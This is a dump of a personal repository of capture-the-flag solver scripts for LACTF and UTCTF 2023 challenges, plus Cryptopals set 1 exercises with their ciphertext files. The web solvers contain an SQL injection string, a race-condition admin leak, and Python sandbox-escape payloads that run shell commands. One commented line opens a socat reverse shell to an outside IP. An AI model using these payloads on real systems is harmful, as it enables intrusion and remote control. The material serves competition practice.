* 7 ^ ~a1[14] + 13) & 0xFF) == 0xFA ) 41 | s.add(((a1[21] ^ a1[25] * 7 ^ ~a1[12] + 13) & 0xFF) == 0xC3 ) 42 | s.add(((a1[26] ^ a1[10] * 7 ^ ~a1[30] + 13) & 0xFF) == 0xCB ) 43 | s.add(((a1[20] ^ a1[2] * 7 ^ ~a1[1] + 13) & 0xFF) == 0x2F ) 44 | s.add(((a1[34] ^ a1[12] * 7 ^ ~a1[27] + 13) & 0xFF) == 0x79 ) 45 | s.add(((a1[19] ^ a1[34] * 7 ^ ~a1[20] + 13) & 0xFF) == 0xF6 ) 46 | s.add(((a1[25] ^ a1[22] * 7 ^ ~a1[14] + 13) & 0xFF) == 0x3D ) 47 | s.add(((a1[19] ^ a1[28] * 7 ^ ~a1[37] + 13) & 0xFF) == 0xBD ) 48 | s.add(((a1[24] ^ a1[9] * 7 ^ ~a1[17] + 13) & 0xFF) == 0xB9) 49 | s.check() 50 | flag = "" 51 | model = s.model() 52 | print(model) 53 | for i in a1: 54 | flag += chr(model[i].as_long()) 55 | print(flag) -------------------------------------------------------------------------------- /solver/2023/lactf/web/85_reasons_why/solver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import base64 3 | import re 4 | 5 | r = requests.session() 6 | proxies = { 7 | 'http': '127.0.0.1:8080', 8 | 'https': '127.0.0.1:8080' 9 | } 10 | b85_string = "a\\\\\\\\\\\\\\'/**/or/**/1=1--/**/-" # target 11 | dec = base64.a85decode(b85_string) 12 | b85 = base64.a85encode(dec) 13 | b85_string = b85.decode('UTF-8', 'ignore') 14 | 15 | b85_string = re.sub('\\\\\\\\\\\\\'', '~', b85_string) 16 | b85_string = re.sub('\'', '\'\'', b85_string) 17 | b85_string = re.sub('~', '\'', b85_string) 18 | b85_string = re.sub('\\:', '~', b85_string) 19 | print(f"check : {b85_string}") 20 | 21 | url = 'https://85-reasons-why.lac.tf/image-search' 22 | 23 | file = {"image-query": ("coba.png", dec)} 24 | 25 | headers = { 26 | "Content-Type": "multipart/form-data", 27 | } 28 | 29 | resp = r.post(url,proxies=proxies,files=file,verify=False) 30 | 31 | print(resp.text) -------------------------------------------------------------------------------- /solver/2023/lactf/web/uuid-hell/leak_uuid.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from threading import Thread 3 | import re 4 | 5 | url = 'https://uuid-hell.lac.tf/' 6 | 7 | def create(): 8 | r = requests.post(url + 'createadmin') 9 | print('Admin account created.') 10 | 11 | def leak(): 12 | r = requests.get(url) 13 | print(re.findall(r'You are logged in as (.*)

', r.text)[0]) 14 | 15 | 16 | 17 | Thread(target=create).start() 18 | Thread(target=leak).start() 19 | Thread(target=create).start() 20 | Thread(target=leak).start() -------------------------------------------------------------------------------- /solver/2023/lactf/web/uuid-hell/solver.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | from itertools import product 3 | import requests 4 | 5 | url = 'https://uuid-hell.lac.tf/' 6 | r = requests.session() 7 | list_admin = "180e8fb46d8fa416fe9b6c4291382c90 a697b273aba170758ac181fbd197171a 64f4daf0bc719a614447a61693fa9192 092727bfe59a732332d0aa79fb3109ef 75d8b9a4c5e8a087109fdc400ad59929 d14461ef279191c403af64db72ba024a ff91255299fb15e80b725cbb3618d5b6 88b30d62ea7c2e9e606ccdccb823f7ce ff4c8b833490d55d1324b1ce7a526393 52940f9121cbc7a5fa73407ed62ca8e2 431c3fbaa9c7aa86c51078cc02a081b6 4ef5ee504dc403b6487aae266c4ecafb e8e71020ba3f8fdc5369e650f3cacae5 ac747a17dcc7b74175fdef4e4be5ddbe 136f4f746d7a8d3bf2e8a8d6bc7eaa47 a2b8a45986798b08ea3de4f9976c7d34 779c514f0d2883a100f4aef4c6cbcc8d a72d8d66b1374aa8cd5eb688082ab14d c5e228e9577edcbc049e8b0950df8956 a9321c241b590da7dbdaaac4ac8edbcb 3728986557acd5024688fdf5576bf180 ee30a9868dbf1f0eca6ae73f4c1b565e 421c787d6e0159d39f1a235d80690039 61e377ac27fb909544d3171db3e36561 d15639ec8a712f5cae8a712286de674f 97d897396ce2076220c5aa7a9a80ab6b 754849fd9d2ee89e0167f0ab4ed3867a 39d531cbac1938c2faf28be8dcc9b4c3 1e0777f26cfa81b9927d8addb2bedb08 40420f3c8f587e90447a7c70be07940e 44c7990896179449d526228764e97514 45a13e10d08ea363beb939e56496d7d9 56c833f38ae387590c331e68fc507d32 cd7d973cb4d70b6c1414fd555664d57f e5a7ebe3826ac71f8dd2a5c0f6c629ec 1b45e0862806fcd565a49df128153649 c69c334f68cf040e24de5f6184adad13 31d9ef888c66e5f71ec1b2fbafa9920a c86786e3aefe93bc55180b9e74df118f 37f4c472f7f4de8cb4a0b1702e462f0d 3072893fc213b58777835273eb973a22 2884a7cd93177decd8962748dcb16417 1b7baa3b4fed51482a3f2d182122f256 e8d6afdbd458e6a8db90cbafd4bd0380 ce338ba398f366ac744de4f4ffa9b902 c598a388e4cc07b32337a088ba39b969 bb575bc969d4a3543586b37e31d3ca00 a91f8a0d29d9d458f3084b9348a4bf8c ef1af636d7940d39143c3c53b1e9ff86 154d84d70ddb38326eb07a39911a5bbc".split(" ") 8 | 9 | # known = 'a7833e90-aa08-11ed-aa64-67696e6b6f69' 10 | known = 'a78{}-aa08-11ed-aa64-67696e6b6f69' 11 | char_hex = "0123456789abcdef" 12 | leaked = "" 13 | for i in product(char_hex,repeat = 5): 14 | tmp = ''.join(i) 15 | tmp = 'admin' + known.format(tmp) 16 | hsh = hashlib.md5(tmp.encode()).hexdigest() 17 | if(hsh in list_admin): 18 | leaked += tmp 19 | break 20 | 21 | cookies = { 22 | 'id' : 'a7845000-aa08-11ed-aa64-67696e6b6f69' 23 | } 24 | print(r.get(url,cookies=cookies).text) -------------------------------------------------------------------------------- /solver/2023/utctf/README.md: -------------------------------------------------------------------------------- 1 | | Category | Challenge 2 | | --- | --- | 3 | | Crypto | [affinity](crypto/affinity/) | 4 | | RE | [game](re/game/) | 5 | | RE | [looks-correct-to-me](re/lookscorrect/) | 6 | | RE | [adventure-rom](re/adventurerom/) | 7 | | Web | [calculator](web/calculator/) | 8 | | Misc | [zipper](misc/zipper/) | -------------------------------------------------------------------------------- /solver/2023/utctf/misc/zipper/solver.py: -------------------------------------------------------------------------------- 1 | from zipfile import ZipFile 2 | 3 | # command.txt -> echo 'Hello World!' 4 | # zipObj = ZipFile('sample.zip', 'w') 5 | # zipObj.write('commands/command.txt') 6 | # zipObj.close() 7 | 8 | # command.txt -> cat flag.txt 9 | zipObj = ZipFile('sample.zip','a') 10 | zipObj.write('commands/command.txt') -------------------------------------------------------------------------------- /solver/2023/utctf/re/adventurerom/solver.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | a = bytes.fromhex("69072CCDD9E8E69AA15B6B6B182D2D02") 4 | 5 | for j in range(0x100): 6 | tmp = "" 7 | key = j 8 | for i in a: 9 | tmp += chr(i^key) 10 | key += 0x17 11 | key &= 0xff 12 | if("UTFLAG" in tmp): 13 | print(j,tmp) 14 | break 15 | -------------------------------------------------------------------------------- /solver/2023/utctf/re/game/solver: -------------------------------------------------------------------------------- 1 | decompile using ffdec then search for assets "definetext 6283" -------------------------------------------------------------------------------- /solver/2023/utctf/web/calculator/solver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | proxies = { 5 | 'http': 'http://127.0.0.1:8080', 6 | 'https': 'http://127.0.0.1:8080', 7 | } 8 | 9 | def craft(payload, level): 10 | return { 11 | "expression": payload, 12 | "type": "calculate", 13 | "level": level 14 | } 15 | 16 | def send_req(pl): 17 | cook = { 18 | "misc-calculator-session": "kkRsd/y07LSuTTSvHm+bDiqJcIt6GEGxnC2A7r366hE=ud1vT6Cv7bseOflGaxwLXi1mzTEMOX/tvNLRL02Ho9uKgkrCVRHs0MaIuOEO13/UZ1myJoo5NIxeQ6xUzOyeOg==" 19 | } 20 | r = requests.post("http://guppy.utctf.live:5957/", proxies = proxies, data=pl, cookies=cook) 21 | return r.text 22 | 23 | def parse(text): 24 | res = re.findall(r"
(.*)\n
", text) 25 | if len(res) > 0: 26 | return res[0] 27 | else: 28 | print(text) 29 | return "No Password!" 30 | 31 | 32 | # Level 1 : PuXqj7n4WNZzStnWbtPv 33 | # contoh = craft("solution", 0) 34 | # while True: 35 | # res1 = send_req(contoh) 36 | # print(parse(res1)) 37 | 38 | # Level 2 : Krdi9yQuY8mHoteZDCF5 39 | # contoh = craft("__import__('os').system('cat __pycache__/random.cpython-38.pyc | base64 -w 0')", 2) 40 | # contoh = craft("123", 2) 41 | 42 | # Level 3 : E46Dnqb5enAMgGArbruu 43 | # contoh = craft("__import__('os').system('cat .p')", 2) 44 | 45 | # Level 4 : 5F4p7aLgQ5Nfn5YM8s68 46 | # contoh = craft("().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__['__import__']('os').system('sh -c \"socat TCP4:103.152.118.74:12345 EXEC:/bin/bash\"')", 3) 47 | contoh = craft("().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__['__import__']('os').system('cat .p')", 3) 48 | while True: 49 | res2 = send_req(contoh) 50 | print(parse(res2)) 51 | break -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/1.py: -------------------------------------------------------------------------------- 1 | import base64 2 | a = "49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d" 3 | print(base64.b64encode(a.decode('hex'))) 4 | -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/2.py: -------------------------------------------------------------------------------- 1 | a = "1c0111001f010100061a024b53535009181c" 2 | b = "686974207468652062756c6c277320657965" 3 | a = a.decode('hex') 4 | b = b.decode('hex') 5 | res = "" 6 | for i in range(0,len(a)): 7 | res += hex(ord(a[i])^ord(b[i]))[2:] 8 | print(res) -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/3.py: -------------------------------------------------------------------------------- 1 | a = "1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736" 2 | a = a.decode('hex') 3 | for i in range(0x100): 4 | tmp = "" 5 | for j in a: 6 | tmp += chr(ord(j)^i) 7 | print(i,tmp) 8 | -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/4.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | def check(hello): 4 | return all(c in string.printable for c in hello) 5 | 6 | f = open("4.txt").read() 7 | for i in f.split("\n"): 8 | a = i.decode('hex') 9 | for j in range(0x100): 10 | tmp = "" 11 | for k in a: 12 | tmp += chr(ord(k)^j) 13 | if(check(tmp)): 14 | # print(i,j) 15 | print(tmp) -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/5.py: -------------------------------------------------------------------------------- 1 | a = "Burning 'em, if you ain't quick and nimble\nI go crazy when I hear a cymbal" 2 | key = "ICE" 3 | res = "" 4 | for i in range(len(a)): 5 | res += hex(ord(key[i%len(key)])^ord(a[i]))[2:].rjust(2,"0") 6 | print(res) -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/6.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import string 3 | 4 | def s2b(a): 5 | res = "" 6 | for i in a: 7 | res += bin(ord(i))[2:].rjust(8,"0") 8 | return res 9 | 10 | def check(a,b): 11 | cnt = 0 12 | for i in range(min(len(a),len(b))): 13 | if(a[i]!=b[i]): 14 | cnt += 1 15 | return cnt 16 | 17 | def lowest_hamming_distance(data,min_length,max_length): 18 | result = {} 19 | for i in range(min_length,max_length+1): 20 | distance = 0 21 | for j in range(0,len(data),i): 22 | first = s2b(data[j:j+i]) 23 | second = s2b(data[j+i:j+2*i]) 24 | distance += check(first,second)/float(i) 25 | result[i] = distance/(len(data)/i) 26 | result = sorted(result.items(), key=lambda x: x[1]) 27 | lowest = result[0] 28 | return lowest[0] 29 | 30 | def create_blocks(data,keysize): 31 | result = ['' for i in range(keysize)] 32 | for i in range(len(data)): 33 | result[i%keysize] += data[i] 34 | return result 35 | 36 | def get_score(message): 37 | score = 0 38 | freq = {'a': 0.0812, 'b': 0.0149, 'c': 0.0271, 'd': 0.0432, 39 | 'e': 0.1202, 'f': 0.0230, 'g': 0.0202, 'h': 0.0592, 'i': 0.0731, 40 | 'j': 0.001, 'k': 0.0069, 'l': 0.0398, 'm': 0.0261, 'n': 0.0695, 41 | 'o': 0.0768, 'p': 0.0182, 'q': 0.0011, 'r': 0.0602, 's': 0.0628, 42 | 't': 0.091, 'u': 0.0288, 'v': 0.0111, 'w': 0.0209, 'x': 0.0017, 43 | 'y': 0.0211, 'z': 0.0007, ' ': .13} 44 | for c in message: 45 | score += freq.get(c, 0) 46 | return score/len(message) 47 | 48 | def find_key(blocks): 49 | key = "" 50 | for ind,i in enumerate(blocks): 51 | highscore = 0 52 | for j in range(0x100): 53 | tmp = "" 54 | for x in i: 55 | tmp += chr(ord(x)^j) 56 | score = get_score(tmp) 57 | if(score>highscore): 58 | tmp_key = chr(j) 59 | highscore = score 60 | key += tmp_key 61 | return key 62 | 63 | # def find_key(blocks): 64 | # key = [[] for i in range(len(blocks))] 65 | # for ind,i in enumerate(blocks): 66 | # for j in range(0x100): 67 | # tmp = "" 68 | # for x in i: 69 | # tmp += chr(ord(x)^j) 70 | # if(all(c in string.printable for c in tmp)): 71 | # key[ind].append(chr(j)) 72 | # return key 73 | 74 | def decode(data,key): 75 | res = "" 76 | for i in range(len(data)): 77 | res += chr(ord(data[i])^ord(key[i%len(key)])) 78 | return res 79 | 80 | 81 | f = open("6.txt").read() 82 | f = base64.b64decode(f) 83 | lowest = lowest_hamming_distance(f,2,40) 84 | blocks = create_blocks(f,lowest) 85 | key = find_key(blocks) 86 | print decode(f,key) -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/6.txt: -------------------------------------------------------------------------------- 1 | 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 -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/7.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | import base64 3 | 4 | f = open("7.txt").read() 5 | f = base64.b64decode(f) 6 | key = "YELLOW SUBMARINE" 7 | cipher = AES.new(key,AES.MODE_ECB) 8 | print(cipher.decrypt(f)) -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/7.txt: -------------------------------------------------------------------------------- 1 | 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 64 | 